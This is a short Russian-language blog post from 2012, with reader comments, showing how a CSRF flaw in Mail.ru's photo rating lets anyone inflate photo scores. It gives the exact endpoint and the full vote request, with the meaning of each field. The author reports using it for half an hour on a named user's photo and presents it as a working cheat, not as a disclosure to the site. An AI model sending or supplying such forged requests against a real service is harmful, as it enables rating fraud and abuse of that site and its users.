Обо всем

Накручиваем рейтинг фото на Mail.ru / CSRF

Сегодня, от безделья решил, чем нибудь заняться, а чем же можно заняться, как не посидеть в соц. сети. Не знаю, как дело дошло до того, что решил проверить метод оценки фотографий. И как тут оказалась, дополнительных, уникальных переменных не передаётся, CSRF)))

Запрос по адресу: http://foto.mail.ru/cgi-bin/photo/ajax

Данные для передачи:

ajax_call=1&func_name=perl_add_vote&data=["[email protected]", 5, 450, "_myphoto", 0, ""]&back=http://foto.mail.ru/mail/sweet_k_92/_myphoto/450.html

[email protected] - ваш емайл, 5 - Оценка, 450 - Номер фотографии.

http://foto.mail.ru/mail/sweet_k_92/_myphoto/450.html - Адрес фото

Вот результат, 30-ти минутной накрутки: http://foto.mail.ru/mail/sweet_k_92/_myphoto/450.html

На момент написания данной статьи, всё работает.

Mail.ru, CSRF

Serj, 20 января 2012

Олександр Шаповал

Олександр Шаповал
2 марта 2016 00:34

Обична CSRF. Видно програмісти на момент написання сайту не виспалися)

2 марта 2016 00:34 Комментировать
Дмитрий Осийчук

Дмитрий Осийчук
24 мая 2012 21:59

Полный бред!

24 мая 2012 21:59 Комментировать
1. Serj
  
  Serj
  29 мая 2012 22:52
  
  Понять только логикой программиста)
  
  29 мая 2012 22:52 Комментировать
2. Раимбек Ишангалиев
  
  Раимбек Ишангалиев
  2 мая 2014 06:11
  
  Sergey, КАК Я понимаю это через проги Charles
  
  2 мая 2014 06:11 Комментировать
3. Serj
  
  Serj
  3 мая 2014 06:02
  
  Raimbek, не правильно понимаешь)
  
  3 мая 2014 06:02 Комментировать